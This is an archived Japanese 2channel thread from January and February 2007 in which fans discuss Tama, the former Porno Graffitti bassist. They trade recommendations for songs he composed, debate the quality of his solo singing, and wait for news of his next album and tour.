165 :NO MUSIC NO NAME:2007/01/12(金) 19:45:56 ID:pLIv8SE9
2ちゃん閉鎖だとさ
これからはTamaを語る事ができなくなるのか

166 :NO MUSIC NO NAME:2007/01/13(土) 20:54:17 ID:0EkX015o
確かに、tamaに関してはどこで語ればいいんだろうね

167 :NO MUSIC NO NAME:2007/01/13(土) 22:28:45 ID:t2x1YtxV
しらたまさんいいっすね。
ポルノ好きで、ミュージックアワーのpv好きだから
何度もみてたら、タマさんのノーリアクションぶりに興味。
昭仁さんとはるいちさんは、目立とうと必死なのに
たまさんはおとなしくて面白かった。
独立してから全然しらんけど、メジャーになって欲しいな

てか2ch閉鎖は釣りデスよね。

168 :NO MUSIC NO NAME:2007/01/13(土) 23:36:11 ID:VvpR4SOx
ドメインが海外のものらしいから閉鎖はないそうだけど…
ここが無くなったら本当悩むな。コミュニティのTamaサークルとかは戻ってこい厨だらけだし。

169 :NO MUSIC NO NAME:2007/01/14(日) 16:36:11 ID:uwCU7cTr
ってかここのヤツって全員元ポルノファン?

170 :NO MUSIC NO NAME:2007/01/14(日) 17:16:06 ID:ZeadMcOE
>>169
・・・言わなくても分かるだろ?

171 :NO MUSIC NO NAME:2007/01/14(日) 17:58:23 ID:uwCU7cTr
>>170(・ε・?)

172 :NO MUSIC NO NAME:2007/01/14(日) 18:41:25 ID:x+PeLD03
つヒント、Tamaは元ポルノ
つヒント2、Tamaは表立った活動をしていない

現役か元ファンか、ってことなら分かんね

173 :NO MUSIC NO NAME:2007/01/14(日) 18:47:29 ID:fA+BDuUT
みんな優しいな

174 :NO MUSIC NO NAME:2007/01/14(日) 21:27:43 ID:Q7bxrT6u
>>167
× ミュージックアワー
○ ミュージック・アワー

心の片隅にでも置いといておくれ。

175 :NO MUSIC NO NAME:2007/01/14(日) 22:24:03 ID:YjXAtiYK
>>174
細かいなぁ…おまえw

176 :NO MUSIC NO NAME:2007/01/15(月) 13:32:07 ID:t9QI5Vr4
いたずらに時間だけが過ぎてるな。

177 :NO MUSIC NO NAME:2007/01/15(月) 16:40:45 ID:OoouXh08
じゃあポルノ時代含む、あなたのNo1Tama曲を言っていこうじゃないか。
もち理由つきで。

178 :NO MUSIC NO NAME:2007/01/15(月) 16:55:53 ID:B6k1cYsq
ポルノを辞めた負け犬さんwww
ポルノが大事な時期に彼女妊娠させて脱退した最低男www
一生ポルノの2人には勝てないねwww
残念www

179 :NO MUSIC NO NAME:2007/01/15(月) 19:19:54 ID:A2FeKBKB
>>177
M・O・O・DだぜM・O・O・D
あの少し古臭いメロディが良い
それから渦だな

180 :NO MUSIC NO NAME:2007/01/15(月) 20:00:03 ID:4QXbXKt/
お前らが好きな曲とかどうでもいい

181 :NO MUSIC NO NAME:2007/01/15(月) 21:25:31 ID:hkDrW+Ar
じゃあ本人が思う会心の1曲とかあるんだろうか

182 :NO MUSIC NO NAME:2007/01/15(月) 23:54:46 ID:cGwlkyhb
本人に聞いてみてはどうかな

183 :NO MUSIC NO NAME:2007/01/16(火) 16:21:51 ID:0qZu8n17
誰かTamaに聞いてこれる人いる?

184 :NO MUSIC NO NAME:2007/01/16(火) 17:10:52 ID:07hFKbeB
聞いてくる

185 :NO MUSIC NO NAME:2007/01/16(火) 18:49:51 ID:ILHf4lrl
デスノートトリュビュート聞いてきました。
ポルノの人だったんだね。tamaって名前にびっくりした。

彼はいい男だよね。ロック調でいい歌を書くし。
ポルノではラテン系音楽しか印象に残ってないけど、彼の作曲したのがあれば聞いてみたい
と思った。

186 :NO MUSIC NO NAME:2007/01/16(火) 19:27:40 ID:TDVyieFh
デスノトリも一応役に立つんだな。
Tama作曲はたくさんあるから
ソニーミュージック→ポルノグラフィティ
でレコード会社側のHPに行って、かたっぱしから試聴するといいよ。
作曲が誰なのかはヤフーミュージックとか歌詞サイトとかで分かるから。
今はシングルが中古で100円とかだし、気に入ったらCD買ってくれ。

187 :NO MUSIC NO NAME:2007/01/17(水) 16:06:41 ID:6103ENO6
ありがとうございます。
ポルノ時代のも聞いたんですけど、サボテンもtama作曲なんですね。
渦とか耳に残ります。
昔からいい曲かいてましたね。結構はまりました。

188 :NO MUSIC NO NAME:2007/01/17(水) 17:21:57 ID:I06ggVur
>>187ラックとビタースイートと幸せについて本気出して考えてみた聴きなされ^^

189 :NO MUSIC NO NAME:2007/01/17(水) 19:52:50 ID:1vygMcmq
PRIMEを捨て置く気か。

190 :NO MUSIC NO NAME:2007/01/17(水) 20:44:31 ID:cCZj06+P
シングルはいつだ
アルバムはいつだ
ツアーはいつからだ

元旦から全然ブログ更新無くてサミシス

191 :NO MUSIC NO NAME:2007/01/17(水) 23:07:25 ID:yb5CTg3b
>>187ビタースイートはガチ

192 :NO MUSIC NO NAME:2007/01/18(木) 00:30:57 ID:q2fyQtwI
月飼いとかデッサン♯1とかSearch the best wayもいいですぞ

193 :NO MUSIC NO NAME:2007/01/18(木) 07:10:29 ID:FhmDeFIS
肝心のジレンマ忘れてるぞコラ。

194 :NO MUSIC NO NAME:2007/01/18(木) 16:37:23 ID:Aw7sWGDi
素晴らしき人生かな?もな

195 :NO MUSIC NO NAME:2007/01/18(木) 16:49:27 ID:wISUUMXN
ありがとうございます!
全部聞いてみます。逆にポルノファンになりそうです
「別れ話をしよう」もtamaですか?

彼は作詞はしないんですか?

196 :NO MUSIC NO NAME:2007/01/18(木) 19:22:44 ID:5Qrme8ww
ジレンマ
Jazz up
ライオン
デッサン#1
ラビュー・ラビュー
PRIME
冷たい手〜3年8カ月〜
Search the best way
サボテン
ダイアリー 00/08/26
グァバジュース
オレ、天使
夜明けまえには
別れ話をしよう
幸せについて本気出して考えてみた
敵はどこだ?
ハート
ニセ彼女
ビタースイート
夜はお静かに
Go Steady Go!

CLUB UNDERWORLD
素晴らしき人生かな?
月飼い
ラック

197 :NO MUSIC NO NAME:2007/01/18(木) 19:24:49 ID:0CJ+IllL
つサボテンSonority

198 :NO MUSIC NO NAME:2007/01/18(木) 19:29:30 ID:URhN/wPd
>>195
興味を持ってくれるのは嬉しいが、多少は自分で調べてみろ。
あと、ラビュー・ラビューとCLUB UNDERWORLDはガチ。

199 :NO MUSIC NO NAME:2007/01/18(木) 20:01:19 ID:wbOQOWnJ
>>195です
すいません調べてきました
 
>>196さんわざわざすいません本当にありがとうございます。

作詞もハルイチとコラボ?で一作くらいでしたね。でも曲がいいからいいか

本当いい曲ばっかですね、ありがとうございました。


200 :NO MUSIC NO NAME:2007/01/18(木) 21:04:02 ID:URhN/wPd
>>196
つAnotherday for“74ers”

201 :NO MUSIC NO NAME:2007/01/18(木) 22:05:43 ID:Uis5Gczo
Anotherday for“74ers”は隠れた名曲

202 :NO MUSIC NO NAME:2007/01/18(木) 23:32:36 ID:0CJ+IllL
もし動くTamaが見たかったら、何かポルノ時代のDVDを見て欲しいかな

一応、ソロでのライブの映像もあるけど……

203 :NO MUSIC NO NAME:2007/01/18(木) 23:56:36 ID:Vh3z2WRA
ソロライブ映像は見ない方がいい
かっこいいTamaだけを見たいならポルノ時代だけ見た方がいい

204 :NO MUSIC NO NAME:2007/01/19(金) 18:57:24 ID:cGPpntjJ
youtubeで74ers?の「メリッサ」をみました!
すっごいかっこよかったので即買いに行きました

本当まじかっこいいですね
しゃべり方も普通にかっこよかったし、演奏もシャウトもすごかったです。

ソロは見ないほうがいいんですか…?そこまで?

205 :NO MUSIC NO NAME:2007/01/19(金) 19:14:34 ID:qfGRu6u9
>>204
がっかりしたくなかったらソロは見ない事をお勧めします

206 :NO MUSIC NO NAME:2007/01/19(金) 22:46:13 ID:0gRxpHhB
馴れ合いキモい

207 :NO MUSIC NO NAME:2007/01/20(土) 00:03:16 ID:mJ4JCzPx
いや、別にキモくないだろ

208 :NO MUSIC NO NAME:2007/01/20(土) 02:03:24 ID:2yAlPH2i
TamaスレなのにTama見ないほうがいいなんて・・・。

209 :NO MUSIC NO NAME:2007/01/20(土) 11:28:55 ID:Xsli9C/5
>>208
まぁ、はっきり言ってソロのTamaは非ヲタにお勧めできるレベルではないわな

210 :NO MUSIC NO NAME:2007/01/20(土) 16:37:23 ID:R5Zx2sMN
ソロ活動はかっこよくないけどベースソロはかっこいいよ

211 :NO MUSIC NO NAME:2007/01/20(土) 19:15:58 ID:4cW+w5RF
>>210に同意

212 :NO MUSIC NO NAME:2007/01/21(日) 15:31:56 ID:CjDLOder
>>204
しゃべり方がかっこいい・・・
TamaのMC聴いて惚れたけど、しゃべりがかっこいいと思ったことない。
ある意味面白くて味はあるが。
非ヲタにはそう見えるのかー

213 :NO MUSIC NO NAME:2007/01/21(日) 20:01:48 ID:UXDz7Jo0
喋りなれてない感が逆に新鮮なのかも…

214 :NO MUSIC NO NAME:2007/01/21(日) 23:53:38 ID:/UaRn28P
ブログ更新全然ないなぁ…
今はアルバムでも作ってんのかな

215 :NO MUSIC NO NAME:2007/01/22(月) 17:11:30 ID:ucmsgtS3
tamaってブログあんの?

216 :NO MUSIC NO NAME:2007/01/22(月) 21:17:21 ID:h0W0g0Tl
NAOTOさんのライヴにTamaちゃん来てたの?

217 :NO MUSIC NO NAME:2007/01/23(火) 23:55:03 ID:5U1Z18oK
今更ぐれぷれ聴いた。
多種多様な曲作りは当にTamaの才能を証明してる。
ファーストシングルはポルノ時代っぽいテイストが滲んでるね。
何にせよ、この才能を余すことなく発揮できるやり方を見つけてよTama
長い目で見ますんでね。
今年のライブ楽しみにしてますよ。

218 :NO MUSIC NO NAME:2007/01/25(木) 18:03:31 ID:MHXFN50g
Tamaちゃんの歌声、初めて聴いて、LIVEのMCも少し聴いたんだけど…
Tamaちゃんが歌ったり喋ったりするのは…_| ̄|○
ポルノ時代のイメージが強すぎるのかもしれないけど。。
先に謝っとく。ごめんなさい。



聴くんじゃなかった_| ̄|○

219 :NO MUSIC NO NAME:2007/01/25(木) 18:08:15 ID:8FWiaoOl
未だに見てないわorz
あ〜もう見ること無いのか…

220 :NO MUSIC NO NAME:2007/01/25(木) 22:16:29 ID:K4tBUkl4
「ちゃん」づけKIMEEEEEEEEEEEEEE

221 :NO MUSIC NO NAME:2007/01/26(金) 01:07:24 ID:9/bvS7tO
スルーしろよ

222 :NO MUSIC NO NAME:2007/01/26(金) 17:01:04 ID:dpVGzYyb
そんなにひどいの?

…生き残れるかなTama…

ポルノ時代からのファンだとTamaちゃんってでてしまう…のは分かるけど…

223 :NO MUSIC NO NAME:2007/01/27(土) 13:51:15 ID:1uxbh2t2
ヒント:ここは2ちゃん

224 :NO MUSIC NO NAME:2007/01/29(月) 03:37:26 ID:9INZBf+L
いつからかママンじゃなくてTamaと呼ぶ住人ばかりになったな

225 :NO MUSIC NO NAME:2007/01/29(月) 06:25:54 ID:HQEeTcNO
ポルノスレとは違う雰囲気だもんね

226 :NO MUSIC NO NAME:2007/01/29(月) 23:33:08 ID:hsaBJqfx
まあ いいことじゃないか

227 :NO MUSIC NO NAME:2007/01/30(火) 11:12:13 ID:E4XM3OlU
ママン(´Д`)ハァーーーン

228 :NO MUSIC NO NAME:2007/01/30(火) 17:22:05 ID:igbjfH4f
ようつべでtamaのみてほれて74ersを今更買ってきたwww
かっこいいのなあの人。知らなかった
Anotherday for“74ers”がいい曲で耳に残ってます
何かtamaソロでお勧めはありますか?

229 :NO MUSIC NO NAME:2007/01/30(火) 17:38:18 ID:dNqBOieN
>>228
ソロ…
Great Pleasure中のFuzz Butterflyとかおすすめかな

230 :NO MUSIC NO NAME:2007/01/30(火) 20:23:07 ID:4nJksDHi
>>228
Anotherday〜はTamaのチョッパー炸裂のCD音源の方が断然神。
74ersではメッツに邪魔されヲタから非難轟々。



そうか、ここではもうママンとは呼べないか…。

231 :NO MUSIC NO NAME:2007/01/31(水) 00:01:28 ID:MPOc9Ooy
メッツが邪魔って(´・ω・`)
ミュージカル的なのも相乗効果でいいのになぁ
オタにも色々いるんだな

232 :NO MUSIC NO NAME:2007/01/31(水) 00:39:48 ID:aysGcpF7
メッツ別に良いと思うけどねぇ

233 :NO MUSIC NO NAME:2007/01/31(水) 01:07:00 ID:aoLj59K2
>>231>>232は当時の2chでの叩かれ様を知らないのか。

234 :NO MUSIC NO NAME:2007/01/31(水) 01:29:35 ID:9DYTjP1k
>>232は知ってても出る発言じゃないか
>>231は叩かれ様を知ってたところで“個人の意見”だから関係ないし

そんな自分はDVDあるのにまだちゃんと見てないww

235 :NO MUSIC NO NAME:2007/01/31(水) 21:01:40 ID:Wc0L04va
べつにママンて呼び名は変わらないでしょ。左とは呼ぶこと無くなっちゃったけどね〜

236 :NO MUSIC NO NAME:2007/02/01(木) 19:30:05 ID:lkVhEeqk
2月だ

ブログ形式にすると日付がむなしくみえるな

237 :NO MUSIC NO NAME:2007/02/01(木) 22:34:00 ID:BGPO5KTI
あぁ……
全く更新の無いまま1ヵ月が過ぎたのか…

238 :NO MUSIC NO NAME:2007/02/02(金) 00:49:34 ID:ruTiBzUs
観劇好きな自分にとっちゃ、74ersは面白かった。

239 :NO MUSIC NO NAME:2007/02/02(金) 01:03:58 ID:dCMYM3jJ
少なくともポルノに74みたいなのは求めてなかった
まぁ終わったことだから

240 :NO MUSIC NO NAME:2007/02/02(金) 19:06:37 ID:Admd3k8e
なんの音沙汰もないね。

241 :NO MUSIC NO NAME:2007/02/04(日) 01:43:39 ID:rofaWJLp
アルバムとかツアーとかいつになるんだろうね。

242 :NO MUSIC NO NAME:2007/02/05(月) 08:10:01 ID:SmiwPXWf
なんの知らせもないのに、ほぼ毎日カキコするTamaオタモエス

243 :NO MUSIC NO NAME:2007/02/05(月) 10:53:45 ID:thpzEKsV
>>241
Tamaのことだから秋とか冬とか…orz

244 :NO MUSIC NO NAME:2007/02/05(月) 16:01:14 ID:aPShI+Ps
>>243
ありえるな。しかしTamaは本気でこれから歌い続ける気なんだろうか

245 :NO MUSIC NO NAME:2007/02/06(火) 00:58:03 ID:Bdx8ft60
ブログ来てるじゃん!
レコーディング入ったんだな

246 :NO MUSIC NO NAME:2007/02/06(火) 01:05:25 ID:bJI3T4fI
お、写真付き

247 :NO MUSIC NO NAME:2007/02/06(火) 18:33:41 ID:zshFTBoI
Tamaってhideの声から癖をとった感じしない??

しないか…

248 :NO MUSIC NO NAME:2007/02/06(火) 20:15:58 ID:6LhaIqVp
俺は、tamaさんを全肯定するよ

tama!!
tama!!!!!!!!

249 :NO MUSIC NO NAME:2007/02/07(水) 15:57:08 ID:JsiDNl2v
Tamaだけにたまに更新する位が丁度良い

250 :NO MUSIC NO NAME:2007/02/07(水) 16:01:42 ID:lLyQViGS
「たま」というより「まれ」・・・?

251 :NO MUSIC NO NAME:2007/02/08(木) 08:11:29 ID:62mrNaw5
ノД`)。゜

252 :NO MUSIC NO NAME:2007/02/08(木) 21:35:35 ID:v7FHAnuQ
また歌ってんのか…

253 :NO MUSIC NO NAME:2007/02/09(金) 12:24:15 ID:eCb69t/+
Tamaかっこいいなー

254 :NO MUSIC NO NAME:2007/02/09(金) 23:40:49 ID:3lN/ccE0
Tamaげんきかー?
嫁と子供もげんきかー?
グレプレライブとセトリ一緒でいーからライブしてよ
生Tama見ないと春が来ないよーん

255 :NO MUSIC NO NAME:2007/02/13(火) 22:18:11 ID:SVyZ4PDP
誰か>>248につっこんでやれよ…

256 :NO MUSIC NO NAME:2007/02/14(水) 19:49:35 ID:vSV/an3f
age

257 :NO MUSIC NO NAME:2007/02/14(水) 21:05:54 ID:PxnYXoqB
つっこんでやる気力も無いなんだぜ

258 :NO MUSIC NO NAME:2007/02/16(金) 08:47:26 ID:yDia67UV
保守

259 :NO MUSIC NO NAME:2007/02/19(月) 07:36:00 ID:MUxky7gk
|-■||


260 :NO MUSIC NO NAME:2007/02/19(月) 11:59:40 ID:CxXHJRzd
WikiでTama Jr.が誕生した時期を初めて知った

261 :NO MUSIC NO NAME:2007/02/19(月) 23:33:33 ID:6HRQWpKj
メールニュースきたー!

262 :NO MUSIC NO NAME:2007/02/20(火) 16:05:16 ID:htN9KOkf
今やっとメルマガ登録してきた!
タマの歌声最初は げっ?!て思ったけど…なんか今は聞き慣れて普通に聞けるよ-になった。曲はまじでかっこいいよな
自分的には晴一の歌声のが受け付けない…orz

263 :NO MUSIC NO NAME:2007/02/20(火) 19:42:01 ID:WvUUHfve
げっって…ヒドスw
まぁ晴一のが下手だねwww


264 :NO MUSIC NO NAME:2007/02/20(火) 20:16:52 ID:YtVRY19U
俺も晴一の歌声は生理的に受け付けなかった
しかし晴一は一回だけだったけど、Tamaはこれからもずっと歌うのか

265 :NO MUSIC NO NAME:2007/02/20(火) 20:27:45 ID:WvUUHfve
だってtamaソロじゃないですか
歌わなかったら誰が歌うのさ
あ、曲だけって手もあるか

266 :NO MUSIC NO NAME:2007/02/20(火) 23:03:57 ID:1fftKapV
晴一もTamaもどっちもどっちだな
両方プロとして通用するような歌唱力じゃないのは確かだ
絶対曲だけにした方がいいってTama

267 :NO MUSIC NO NAME:2007/02/21(水) 23:23:02 ID:wlTISgIj
自分もファンなのに申し訳ない言い方だが
年末のライブ「へったくそだな〜」と思いながら聴いてた・・
Tamaは死に物狂いで音程と小節を安定させないと話にならんよ・・真面目に・・

268 :NO MUSIC NO NAME:2007/02/22(木) 02:44:26 ID:PMIdHfWN
ねぇ、やっぱりインストでさ、アルバム作らない?
いや、インストだけじゃなくてもいいんだよ、半々くらいでさ。
ベース弾きなんでしょ?

269 :NO MUSIC NO NAME:2007/02/22(木) 07:09:38 ID:znIqM2UA
次のアルバムもし全曲Tamaが歌ってたら嫌だ

270 :NO MUSIC NO NAME:2007/02/22(木) 23:45:59 ID:Etya/3tI
まだ他アー比較してる馬鹿がいんのか

271 :マグロ ◆CV2rYcFkVE :2007/02/23(金) 00:44:02 ID:PmDZlC/V
00:00~00:45のNHKのトップランナーでFuzz Butterfly流れた。

272 :NO MUSIC NO NAME:2007/02/23(金) 03:22:43 ID:HNEUkQs6
トップランナーのゲスト、ヨシコクリエイションの人だったのか。
見たかった…

273 :NO MUSIC NO NAME:2007/02/23(金) 09:47:43 ID:2uMoc5jV
>>271
何そのコテ?wエロスww

274 :NO MUSIC NO NAME:2007/02/23(金) 20:38:14 ID:iZnqKLER
>>273
マグロさんは現ポルノスレの過去ログ置き場の中の人だよ。

47 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)